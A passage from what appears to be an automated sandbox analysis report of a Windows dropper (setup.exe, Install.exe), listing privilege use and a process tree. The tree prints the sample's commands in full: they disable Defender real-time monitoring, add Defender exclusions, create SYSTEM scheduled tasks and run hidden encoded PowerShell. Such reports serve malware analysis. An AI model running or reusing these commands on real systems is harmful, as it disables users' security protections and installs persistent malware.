SeLoadDriverPrivilege 272 WMIC.exe Token: SeSystemtimePrivilege 272 WMIC.exe Token: SeBackupPrivilege 272 WMIC.exe Token: SeRestorePrivilege 272 WMIC.exe Token: SeShutdownPrivilege 272 WMIC.exe Token: SeSystemEnvironmentPrivilege 272 WMIC.exe Token: SeUndockPrivilege 272 WMIC.exe Token: SeManageVolumePrivilege 272 WMIC.exe Token: SeDebugPrivilege 1036 powershell.EXE Token: SeDebugPrivilege 1424 powershell.exe Token: SeDebugPrivilege 2200 powershell.exe Token: SeAssignPrimaryTokenPrivilege 2072 WMIC.exe Token: SeIncreaseQuotaPrivilege 2072 WMIC.exe Token: SeSecurityPrivilege 2072 WMIC.exe Token: SeTakeOwnershipPrivilege 2072 WMIC.exe Token: SeLoadDriverPrivilege 2072 WMIC.exe Token: SeSystemtimePrivilege 2072 WMIC.exe Token: SeBackupPrivilege 2072 WMIC.exe Token: SeRestorePrivilege 2072 WMIC.exe Token: SeShutdownPrivilege 2072 WMIC.exe Token: SeSystemEnvironmentPrivilege 2072 WMIC.exe Token: SeUndockPrivilege 2072 WMIC.exe Token: SeManageVolumePrivilege 2072 WMIC.exe Token: SeDebugPrivilege 1508 powershell.exe Token: SeAssignPrimaryTokenPrivilege 1560 WMIC.exe Token: SeIncreaseQuotaPrivilege 1560 WMIC.exe Token: SeSecurityPrivilege 1560 WMIC.exe Token: SeTakeOwnershipPrivilege 1560 WMIC.exe Token: SeLoadDriverPrivilege 1560 WMIC.exe Token: SeSystemtimePrivilege 1560 WMIC.exe Token: SeBackupPrivilege 1560 WMIC.exe Token: SeRestorePrivilege 1560 WMIC.exe Token: SeShutdownPrivilege 1560 WMIC.exe Token: SeSystemEnvironmentPrivilege 1560 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
setup.exeInstall.execmd.exeforfiles.execmd.exeforfiles.execmd.exeforfiles.exedescription pid process target process PID 2872 wrote to memory of 2564 2872 setup.exe Install.exe PID 2872 wrote to memory of 2564 2872 setup.exe Install.exe PID 2872 wrote to memory of 2564 2872 setup.exe Install.exe PID 2872 wrote to memory of 2564 2872 setup.exe Install.exe PID 2872 wrote to memory of 2564 2872 setup.exe Install.exe PID 2872 wrote to memory of 2564 2872 setup.exe Install.exe PID 2872 wrote to memory of 2564 2872 setup.exe Install.exe PID 2564 wrote to memory of 2588 2564 Install.exe cmd.exe PID 2564 wrote to memory of 2588 2564 Install.exe cmd.exe PID 2564 wrote to memory of 2588 2564 Install.exe cmd.exe PID 2564 wrote to memory of 2588 2564 Install.exe cmd.exe PID 2564 wrote to memory of 2588 2564 Install.exe cmd.exe PID 2564 wrote to memory of 2588 2564 Install.exe cmd.exe PID 2564 wrote to memory of 2588 2564 Install.exe cmd.exe PID 2588 wrote to memory of 2600 2588 cmd.exe forfiles.exe PID 2588 wrote to memory of 2600 2588 cmd.exe forfiles.exe PID 2588 wrote to memory of 2600 2588 cmd.exe forfiles.exe PID 2588 wrote to memory of 2600 2588 cmd.exe forfiles.exe PID 2588 wrote to memory of 2600 2588 cmd.exe forfiles.exe PID 2588 wrote to memory of 2600 2588 cmd.exe forfiles.exe PID 2588 wrote to memory of 2600 2588 cmd.exe forfiles.exe PID 2600 wrote to memory of 2576 2600 forfiles.exe cmd.exe PID 2600 wrote to memory of 2576 2600 forfiles.exe cmd.exe PID 2600 wrote to memory of 2576 2600 forfiles.exe cmd.exe PID 2600 wrote to memory of 2576 2600 forfiles.exe cmd.exe PID 2600 wrote to memory of 2576 2600 forfiles.exe cmd.exe PID 2600 wrote to memory of 2576 2600 forfiles.exe cmd.exe PID 2600 wrote to memory of 2576 2600 forfiles.exe cmd.exe PID 2576 wrote to memory of 2528 2576 cmd.exe reg.exe PID 2576 wrote to memory of 2528 2576 cmd.exe reg.exe PID 2576 wrote to memory of 2528 2576 cmd.exe reg.exe PID 2576 wrote to memory of 2528 2576 cmd.exe reg.exe PID 2576 wrote to memory of 2528 2576 cmd.exe reg.exe PID 2576 wrote to memory of 2528 2576 cmd.exe reg.exe PID 2576 wrote to memory of 2528 2576 cmd.exe reg.exe PID 2588 wrote to memory of 2496 2588 cmd.exe forfiles.exe PID 2588 wrote to memory of 2496 2588 cmd.exe forfiles.exe PID 2588 wrote to memory of 2496 2588 cmd.exe forfiles.exe PID 2588 wrote to memory of 2496 2588 cmd.exe forfiles.exe PID 2588 wrote to memory of 2496 2588 cmd.exe forfiles.exe PID 2588 wrote to memory of 2496 2588 cmd.exe forfiles.exe PID 2588 wrote to memory of 2496 2588 cmd.exe forfiles.exe PID 2496 wrote to memory of 2808 2496 forfiles.exe cmd.exe PID 2496 wrote to memory of 2808 2496 forfiles.exe cmd.exe PID 2496 wrote to memory of 2808 2496 forfiles.exe cmd.exe PID 2496 wrote to memory of 2808 2496 forfiles.exe cmd.exe PID 2496 wrote to memory of 2808 2496 forfiles.exe cmd.exe PID 2496 wrote to memory of 2808 2496 forfiles.exe cmd.exe PID 2496 wrote to memory of 2808 2496 forfiles.exe cmd.exe PID 2808 wrote to memory of 2380 2808 cmd.exe reg.exe PID 2808 wrote to memory of 2380 2808 cmd.exe reg.exe PID 2808 wrote to memory of 2380 2808 cmd.exe reg.exe PID 2808 wrote to memory of 2380 2808 cmd.exe reg.exe PID 2808 wrote to memory of 2380 2808 cmd.exe reg.exe PID 2808 wrote to memory of 2380 2808 cmd.exe reg.exe PID 2808 wrote to memory of 2380 2808 cmd.exe reg.exe PID 2588 wrote to memory of 2680 2588 cmd.exe forfiles.exe PID 2588 wrote to memory of 2680 2588 cmd.exe forfiles.exe PID 2588 wrote to memory of 2680 2588 cmd.exe forfiles.exe PID 2588 wrote to memory of 2680 2588 cmd.exe forfiles.exe PID 2588 wrote to memory of 2680 2588 cmd.exe forfiles.exe PID 2588 wrote to memory of 2680 2588 cmd.exe forfiles.exe PID 2588 wrote to memory of 2680 2588 cmd.exe forfiles.exe PID 2680 wrote to memory of 2668 2680 forfiles.exe cmd.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2872 -
C:\Users\Admin\AppData\Local\Temp\7zS2710.tmp\Install.exe.\Install.exe /WkfdidVYT "385118" /S2⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:2564 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵
- Suspicious use of WriteProcessMemory
PID:2588 -
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"4⤵
- Suspicious use of WriteProcessMemory
PID:2600 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵
- Suspicious use of WriteProcessMemory
PID:2576 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 66⤵PID:2528
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"4⤵
- Suspicious use of WriteProcessMemory
PID:2496 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵
- Suspicious use of WriteProcessMemory
PID:2808 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 66⤵PID:2380
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"4⤵
- Suspicious use of WriteProcessMemory
PID:2680 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵PID:2668
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 66⤵PID:2708
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"4⤵PID:2488
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵PID:2640
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 66⤵PID:2676
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"4⤵PID:2408
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵PID:2732
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force6⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2396 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force7⤵PID:2052
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"3⤵PID:2760
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True4⤵PID:2784
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True5⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1456 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True6⤵
- Suspicious use of AdjustPrivilegeToken
PID:1800 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "biPxHmULFllsbMgnpt" /SC once /ST 20:51:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\rhuXFflbMyLRQZzPf\PbVgkoeGEfQyDQK\bEaZhrS.exe\" Wt /aQCdidOZZK 385118 /S" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1444 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn biPxHmULFllsbMgnpt"3⤵PID:1440
-
C:\Windows\SysWOW64\cmd.exe/C schtasks /run /I /tn biPxHmULFllsbMgnpt4⤵PID:2552
-
\??\c:\windows\SysWOW64\schtasks.exeschtasks /run /I /tn biPxHmULFllsbMgnpt5⤵PID:2612
-
C:\Windows\system32\taskeng.exetaskeng.exe {9C8DAE6D-DCE9-4058-A262-5A84C02196C0} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:2652
-
C:\Users\Admin\AppData\Local\Temp\rhuXFflbMyLRQZzPf\PbVgkoeGEfQyDQK\bEaZhrS.exeC:\Users\Admin\AppData\Local\Temp\rhuXFflbMyLRQZzPf\PbVgkoeGEfQyDQK\bEaZhrS.exe Wt /aQCdidOZZK 385118 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:744 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵PID:1008
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"4⤵PID:1324
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵PID:1160
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 66⤵PID:1244
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"4⤵PID:1172
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵PID:1692
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 66⤵PID:2412
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"4⤵PID:2324
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵PID:2960
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 66⤵PID:2948
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"4⤵PID:2936
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵PID:2944
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 66⤵PID:2260
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"4⤵PID:1408
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵PID:2100
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2232 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force7⤵PID:2032
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "grnlSLtgx" /SC once /ST 15:38:42 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:2352 -
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "grnlSLtgx"3⤵PID:576
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "grnlSLtgx"3⤵PID:772
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵PID:2840
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:324⤵
- Modifies Windows Defender Real-time Protection settings
PID:1640 -
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵PID:1860
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:644⤵
- Modifies Windows Defender Real-time Protection settings
PID:1992 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gRzUhHKQt" /SC once /ST 12:13:47 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:3016 -
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gRzUhHKQt"3⤵PID:2148
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gRzUhHKQt"3⤵PID:2588
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"3⤵PID:2480
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True4⤵PID:1592
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True5⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2856 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True6⤵
- Suspicious use of AdjustPrivilegeToken
PID:272 -
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\nlcUipsDcFbdntMB" /t REG_DWORD /d 0 /reg:323⤵PID:796
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\nlcUipsDcFbdntMB" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2880 -
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\nlcUipsDcFbdntMB" /t REG_DWORD /d 0 /reg:643⤵PID:1936
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\nlcUipsDcFbdntMB" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1920 -
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\nlcUipsDcFbdntMB" /t REG_DWORD /d 0 /reg:323⤵PID:1456
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\nlcUipsDcFbdntMB" /t REG_DWORD /d 0 /reg:324⤵PID:2760
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\nlcUipsDcFbdntMB" /t REG_DWORD /d 0 /reg:643⤵PID:2772
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\nlcUipsDcFbdntMB" /t REG_DWORD /d 0 /reg:644⤵PID:1548
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\nlcUipsDcFbdntMB\tOKaOeOd\udXmpsNXrpxEuFTL.wsf"3⤵PID:2432
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\nlcUipsDcFbdntMB\tOKaOeOd\udXmpsNXrpxEuFTL.wsf"3⤵
- Modifies data under HKEY_USERS
PID:2620 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HwnzDfNzNWHpPtLDwZR" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:840 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HwnzDfNzNWHpPtLDwZR" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1344 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ecOJmsgAHWlsC" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:3044 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ecOJmsgAHWlsC" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2324 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\epoBtGYzqLvU2" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2140 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\epoBtGYzqLvU2" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2012 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qIYKRzUEasUn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2204 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qIYKRzUEasUn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:612 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zgoZGMcaU" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2296 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zgoZGMcaU" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2924 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\pICeQFkDCDDquYVB" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1756 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\pICeQFkDCDDquYVB" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2904 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:576 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2556 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\rhuXFflbMyLRQZzPf" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2084 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\rhuXFflbMyLRQZzPf" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1676 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\nlcUipsDcFbdntMB" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:3020 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\nlcUipsDcFbdntMB" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1436 -
